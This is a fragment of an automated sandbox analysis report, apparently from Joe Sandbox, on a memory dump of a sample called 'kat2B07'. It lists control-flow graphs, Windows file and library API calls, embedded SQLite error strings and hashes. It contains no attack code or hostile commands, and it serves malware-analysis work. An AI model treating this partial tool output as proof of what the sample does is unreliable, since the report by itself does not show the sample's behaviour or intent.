65->43 68 1d744e1e-1d744e23 65->68 70 1d744f95 66->70 71 1d744ef2-1d744ef7 66->71 68->30 68->43 72 1d744f99-1d744f9b 70->72 73 1d744f40-1d744f4c 71->73 74 1d744ef9-1d744f09 71->74 78 1d744fc4-1d744fc7 72->78 79 1d744f9d-1d744fc1 call 1d73415b 72->79 90 1d744f91-1d744f93 73->90 91 1d744f4e-1d744f51 73->91 76 1d744f0d-1d744f2e call 1d748c40 74->76 77 1d744f0b 74->77 95 1d744f30 76->95 96 1d744f32-1d744f34 76->96 77->76 84 1d745140-1d745146 78->84 85 1d744fcd-1d744fdf call 1d732f5e 78->85 79->78 87 1d745154-1d74516d call 1d732f5e 84->87 88 1d745148-1d745152 84->88 100 1d745036-1d74503b 85->100 101 1d744fe1-1d744fe8 85->101 114 1d7451c4-1d7451c6 87->114 115 1d74516f-1d745176 87->115 88->87 90->72 98 1d744f73-1d744f8c 91->98 99 1d744f53-1d744f56 91->99 95->96 104 1d744f36-1d744f3a 96->104 105 1d744f3c 96->105 98->66 99->98 106 1d744f58-1d744f5b 99->106 108 1d745041-1d745046 100->108 109 1d745103-1d74513f call 1d8c8850 call 1d836b50 call 1d7325bd 100->109 110 1d74502c 101->110 111 1d744fea-1d744ff1 101->111 104->70 104->105 105->73 106->98 107 1d744f5d-1d744f60 106->107 107->98 116 1d744f62-1d744f65 107->116 108->109 117 1d74504c-1d745068 108->117 125 1d745033 110->125 118 1d744ff3-1d744ffa 111->118 119 1d744ffd-1d745021 111->119 120 1d7451cc 114->120 121 1d7451c8-1d7451ca 114->121 122 1d745178-1d74517f 115->122 123 1d7451ba 115->123 116->98 126 1d744f67-1d744f6a 116->126 117->1 118->119 119->100 151 1d745023-1d74502a 119->151 127 1d7451d1-1d7451e2 120->127 121->127 128 1d745181-1d745188 122->128 129 1d74518b-1d7451af 122->129 133 1d7451c1 123->133 125->100 126->98 131 1d744f6c-1d744f71 126->131 135 1d7451e4 127->135 136 1d7451e8-1d7451f3 127->136 128->129 129->114 154 1d7451b1-1d7451b8 129->154 131->90 131->98 133->114 135->136 140 1d7451f5-1d745208 call 1d733f53 136->140 141 1d74521f-1d74526e call 1d7325bd 136->141 152 1d74520a-1d745219 call 1d7dcab0 140->152 153 1d74521b 140->153 151->125 152->141 152->153 153->141 154->133
                                                                APIs
                                                                • CreateFileW.KERNEL32(?,C0000000,00000003,00000000,-00000003,04000102,00000000), ref: 1D744EE1
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true
                                                                • Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd
                                                                Similarity
                                                                • API ID: CreateFile
                                                                • String ID: delayed %dms for lock/sharing conflict at line %d$exclusive$psow$winOpen
                                                                • API String ID: 823142352-3829269058
                                                                • Opcode ID: 12c698d0b923f16a1f5f30a447e0c950ab673321e2eb1048f2a5493b0758fce4
                                                                • Instruction ID: 56d79ae7f314fb1d9345e7898ae0fba0fa1d9d0f07589070667d8d66110bac18
                                                                • Opcode Fuzzy Hash: 12c698d0b923f16a1f5f30a447e0c950ab673321e2eb1048f2a5493b0758fce4
                                                                • Instruction Fuzzy Hash: 4DF1CD71A083119BDB018F24C8C4B2A77F4BF85369F248A6EF945C7291DB75E844CB93

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 159 1d9105b4-1d9105c0 160 1d910652-1d910655 159->160 161 1d9105c5-1d9105d6 160->161 162 1d91065b 160->162 164 1d9105e3-1d9105fc LoadLibraryExW 161->164 165 1d9105d8-1d9105db 161->165 163 1d91065d-1d910661 162->163 168 1d910662-1d910672 164->168 169 1d9105fe-1d910607 GetLastError 164->169 166 1d9105e1 165->166 167 1d91067b-1d91067d 165->167 171 1d91064f 166->171 167->163 168->167 170 1d910674-1d910675 FreeLibrary 168->170 172 1d910640-1d91064d 169->172 173 1d910609-1d91061b call 1d733ea4 169->173 170->167 171->160 172->171 173->172 176 1d91061d-1d91062f call 1d733ea4 173->176 176->172 179 1d910631-1d91063e LoadLibraryExW 176->179 179->168 179->172
                                                                APIs
                                                                • FreeLibrary.KERNEL32(00000000,?,00000000,00000800,?,?,?,CE37D569,?,1D9106F5,?,?), ref: 1D910675
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true
                                                                • Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd
                                                                Similarity
                                                                • API ID: FreeLibrary
                                                                • String ID: api-ms-$ext-ms-
                                                                • API String ID: 3664257935-537541572
                                                                • Opcode ID: aacd322767f75ac4a6ab84b828ecb19fa476838fec797e10ede83f8f85eb9b07
                                                                • Instruction ID: a787166207dd71b85294b7af74dd3c2e0709a578541277154c5a992402183afe
                                                                • Opcode Fuzzy Hash: aacd322767f75ac4a6ab84b828ecb19fa476838fec797e10ede83f8f85eb9b07
                                                                • Instruction Fuzzy Hash: 8521E732B05136A7D7139B61CC85B9A7B6CAB827F0F110329E91DEF281D635ED00CAD6

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 180 1d73fd40-1d73fd65 181 1d73fd67 180->181 182 1d73fdcd-1d73fdd1 180->182 183 1d73fd69-1d73fd6b 181->183 184 1d73fd6d-1d73fd7b 181->184 185 1d73fdd5-1d73fdf0 182->185 183->182 183->184 186 1d73fda0-1d73fdcb call 1d734002 184->186 187 1d73fd7d 184->187 188 1d73fdf4-1d73fe0b ReadFile 185->188 186->185 189 1d73fd83-1d73fd93 call 1d734002 187->189 190 1d73fd7f-1d73fd81 187->190 192 1d73fe58-1d73fe5e 188->192 193 1d73fe0d-1d73fe16 188->193 202 1d73fd96-1d73fd9f 189->202 190->186 190->189 195 1d73fe60-1d73fe84 call 1d73415b 192->195 196 1d73fe87-1d73fe8d 192->196 193->192 203 1d73fe18-1d73fe2c call 1d8c91c0 193->203 195->196 201 1d73fe93-1d73feaf call 1d73263a 196->201 196->202 203->188 209 1d73fe2e-1d73fe57 call 1d8c8850 203->209
                                                                APIs
                                                                • ReadFile.KERNEL32(?,?,?,?,?), ref: 1D73FE03
                                                                Strings
                                                                • winRead, xrefs: 1D73FE3D
                                                                • delayed %dms for lock/sharing conflict at line %d, xrefs: 1D73FE78
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true
                                                                • Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd
                                                                Similarity
                                                                • API ID: FileRead
                                                                • String ID: delayed %dms for lock/sharing conflict at line %d$winRead
                                                                • API String ID: 2738559852-1843600136
                                                                • Opcode ID: fc0080910cc290b8271d8080e0614a61a3e7aa759b3348354cd457f0820b2a61
                                                                • Instruction ID: 8bdf069ea7a3778dd896a6dc89a7f0c5f98d99297349a8694c1a0d348b02bf81
                                                                • Opcode Fuzzy Hash: fc0080910cc290b8271d8080e0614a61a3e7aa759b3348354cd457f0820b2a61
                                                                • Instruction Fuzzy Hash: BB410772608345BBC304DE64DD859ABF7A8FF84265F84092EF68483652D735E9188BA3

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 212 1d8e066b-1d8e0680 LoadLibraryExW 213 1d8e06b4-1d8e06b5 212->213 214 1d8e0682-1d8e068b GetLastError 212->214 215 1d8e068d-1d8e06a1 call 1d733ea4 214->215 216 1d8e06b2 214->216 215->216 219 1d8e06a3-1d8e06b1 LoadLibraryExW 215->219 216->213
                                                                APIs
                                                                • LoadLibraryExW.KERNEL32(?,00000000,00000800,?,1D8E0513,?,?,?,?,?,?,1D8E07BD,00000003,FlsSetValue,1D957770,1D957778), ref: 1D8E0678
                                                                • GetLastError.KERNEL32(?,1D8E0513,?,?,?,?,?,?,1D8E07BD,00000003,FlsSetValue,1D957770,1D957778), ref: 1D8E0682
                                                                • LoadLibraryExW.KERNEL32(?,00000000,00000000), ref: 1D8E06AA
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true
                                                                • Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd
                                                                Similarity
                                                                • API ID: LibraryLoad$ErrorLast
                                                                • String ID: api-ms-
                                                                • API String ID: 3177248105-2084034818
                                                                • Opcode ID: 9ee83f4919f313c7feaae0c3dd5375538963c37ca7d88e139241ff6b8a86dd05
                                                                • Instruction ID: 586bea5dba7a4fb493aeb4764e676003e023ed56503b75a482657d7a216b8ece
                                                                • Opcode Fuzzy Hash: 9ee83f4919f313c7feaae0c3dd5375538963c37ca7d88e139241ff6b8a86dd05
                                                                • Instruction Fuzzy Hash: 78E04870244316B7EB101EA1DC4AB593F649B427D1F104830F90CE41A2D775A951CE59

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 220 1d7604d0-1d7604d5 call 1d7313e3 222 1d7604da-1d7604e1 220->222 223 1d7604e3-1d7604f6 call 1d73415b 222->223 224 1d7604f8-1d7604f9 222->224 223->224
                                                                Strings
                                                                • failed to allocate %u bytes of memory, xrefs: 1D7604E7
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true
                                                                • Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: failed to allocate %u bytes of memory
                                                                • API String ID: 0-1168259600
                                                                • Opcode ID: 53020f8799999e0bf787a246d1ff2ea44be64d422e1145c0d22084779b35e2f8
                                                                • Instruction ID: bbae24e07ed71f1d31305c0b366879e8b33641a3c173070659175a749f86b078
                                                                • Opcode Fuzzy Hash: 53020f8799999e0bf787a246d1ff2ea44be64d422e1145c0d22084779b35e2f8
                                                                • Instruction Fuzzy Hash: 91D02226D8C63273C3221180FC00ACB3E508B901B2F068034FE8C19232E655A85083E3

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 227 1d8e04c2-1d8e04dd 228 1d8e04df-1d8e04e1 227->228 229 1d8e04e3-1d8e04e5 227->229 230 1d8e0539-1d8e053b 228->230 229->230 231 1d8e04e7-1d8e04ec 229->231 232 1d8e052b-1d8e052e 231->232 233 1d8e04ee-1d8e04ff 232->233 234 1d8e0530-1d8e0535 232->234 236 1d8e0507-1d8e050e call 1d8e066b 233->236 237 1d8e0501-1d8e0503 233->237 235 1d8e0537-1d8e0538 234->235 235->230 243 1d8e0513-1d8e0522 236->243 238 1d8e054b-1d8e0557 GetProcAddress 237->238 239 1d8e0505 237->239 238->234 241 1d8e0559-1d8e0560 238->241 242 1d8e0528 239->242 241->235 242->232 244 1d8e053c-1d8e0542 243->244 245 1d8e0524-1d8e0526 243->245 244->238 246 1d8e0544-1d8e0545 FreeLibrary 244->246 245->242 246->238
                                                                APIs
                                                                • FreeLibrary.KERNEL32(00000000,?,?,?,?,?,1D8E07BD,00000003,FlsSetValue,1D957770,1D957778), ref: 1D8E0545
                                                                • GetProcAddress.KERNEL32(00000000,?,?,?,?,?,?,1D8E07BD,00000003,FlsSetValue,1D957770,1D957778), ref: 1D8E054F
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true
                                                                • Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd
                                                                Similarity
                                                                • API ID: AddressFreeLibraryProc
                                                                • String ID:
                                                                • API String ID: 3013587201-0
                                                                • Opcode ID: c8b9334e45d6d5d454c5eadc3d0c3fb81f5b6c10811d305ca9a3be592fc1ab7a
                                                                • Instruction ID: 11fa8c254111d9d0ac1f66b30b1bc824b1e4045a4b2e5029d3e5ca2bf45f8fa8
                                                                • Opcode Fuzzy Hash: c8b9334e45d6d5d454c5eadc3d0c3fb81f5b6c10811d305ca9a3be592fc1ab7a
                                                                • Instruction Fuzzy Hash: EC115C366052369FCB12CE54D8809AE77B4BB4B6D07104A69E905AB244E634DA43CFD2

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 247 1d9106b1-1d9106db 248 1d9106e1-1d9106e3 247->248 249 1d9106dd-1d9106df 247->249 251 1d9106e5-1d9106e7 248->251 252 1d9106e9-1d9106f0 call 1d9105b4 248->252 250 1d910732-1d910735 249->250 251->250 254 1d9106f5-1d9106f9 252->254 255 1d910718-1d91072f 254->255 256 1d9106fb-1d910709 GetProcAddress 254->256 258 1d910731 255->258 256->255 257 1d91070b-1d910716 call 1d7333e1 256->257 257->258 258->250
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true
                                                                • Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: a8c09af3453851cd0a01f156f07df455e78b2cf8d5a7edd1d3164c25338616d7
                                                                • Instruction ID: e4a0dd339134255a685de222ac904f68a7dd75a2d46f3c296f177015f125d02a
                                                                • Opcode Fuzzy Hash: a8c09af3453851cd0a01f156f07df455e78b2cf8d5a7edd1d3164c25338616d7
                                                                • Instruction Fuzzy Hash: D50196377042399FDF078969DCC0A6A37A9BBC26707114728F9089F184DA369941CF91
                                                                Strings
                                                                • SELECT parentnode FROM %Q.'%q_parent' WHERE nodeno=?1, xrefs: 1D814498
                                                                • Dimension %d of cell %d on node %lld is corrupt relative to parent, xrefs: 1D81444D
                                                                • Rtree depth out of range (%d), xrefs: 1D81428E
                                                                • Dimension %d of cell %d on node %lld is corrupt, xrefs: 1D8143D7
                                                                • %_parent, xrefs: 1D8144D4, 1D81451E
                                                                • SELECT data FROM %Q.'%q_node' WHERE nodeno=?, xrefs: 1D814166
                                                                • Mapping (%lld -> %lld) missing from %s table, xrefs: 1D8144E6, 1D8145C2
                                                                • %_rowid, xrefs: 1D8145B0, 1D8145FA
                                                                • SELECT nodeno FROM %Q.'%q_rowid' WHERE rowid=?1, xrefs: 1D814574
                                                                • Node %lld missing from database, xrefs: 1D814230
                                                                • Node %lld is too small (%d bytes), xrefs: 1D81425A
                                                                • Found (%lld -> %lld) in %s table, expected (%lld -> %lld), xrefs: 1D814527, 1D814603
                                                                • Node %lld is too small for cell count of %d (%d bytes), xrefs: 1D81432B
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true
                                                                • Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: %_parent$%_rowid$Dimension %d of cell %d on node %lld is corrupt$Dimension %d of cell %d on node %lld is corrupt relative to parent$Found (%lld -> %lld) in %s table, expected (%lld -> %lld)$Mapping (%lld -> %lld) missing from %s table$Node %lld is too small (%d bytes)$Node %lld is too small for cell count of %d (%d bytes)$Node %lld missing from database$Rtree depth out of range (%d)$SELECT data FROM %Q.'%q_node' WHERE nodeno=?$SELECT nodeno FROM %Q.'%q_rowid' WHERE rowid=?1$SELECT parentnode FROM %Q.'%q_parent' WHERE nodeno=?1
                                                                • API String ID: 0-1352829109
                                                                • Opcode ID: 9a3974aac1e8b91f04952c4850cc4b899ae45451d3de06c1a343e1d766311573
                                                                • Instruction ID: 850fd0ad0f6585927033bc0ada68a463a9f7f8b3d2da4c3400ae30a76b98ccb9
                                                                • Opcode Fuzzy Hash: 9a3974aac1e8b91f04952c4850cc4b899ae45451d3de06c1a343e1d766311573
                                                                • Instruction Fuzzy Hash: 4CF122B1808250AFC7058F2CDC84A2BBBB8FF85354F05496DF9499B212E735E558CBA3
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true
                                                                • Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: %s mode not allowed: %s$cach$file$invalid uri authority: %.*s$lhos$loca$mode$no such %s mode: %s$no such vfs: %s
                                                                • API String ID: 0-1127695371
                                                                • Opcode ID: 5446e2379d70be0561770a4d61b3ed398f9936d80116f639e229a230a0cce27d
                                                                • Instruction ID: 341fbf3d33b4e7be9b53151003fbb38bae242a7e0f528259dba929136e765a96
                                                                • Opcode Fuzzy Hash: 5446e2379d70be0561770a4d61b3ed398f9936d80116f639e229a230a0cce27d
                                                                • Instruction Fuzzy Hash: 95F116B89083A68FE7118E24C4A077ABBB2BF86314F54465DF4D94B392D7369447CB43
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true
                                                                • Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: $%s: table does not support scanning$ASC$DESC$SELECT rowid, rank FROM %Q.%Q ORDER BY %s("%w"%s%s) %s$parse error in rank function: %s$recursively defined fts5 content table
                                                                • API String ID: 0-2381147695
                                                                • Opcode ID: 20e95371b2d3ae55ef0e862be42fbd4850fe2b1865436354de1a28080467accd
                                                                • Instruction ID: 895d5e3717091d5162872d8d5492257441e1e5b4ef54f2a50e0faca6c513d44a
                                                                • Opcode Fuzzy Hash: 20e95371b2d3ae55ef0e862be42fbd4850fe2b1865436354de1a28080467accd
                                                                • Instruction Fuzzy Hash: AB22CCB1904351DFDB04CF25C880B6ABBF4BF8A324F05492AF9499B251E735E855CB93
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true
                                                                • Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
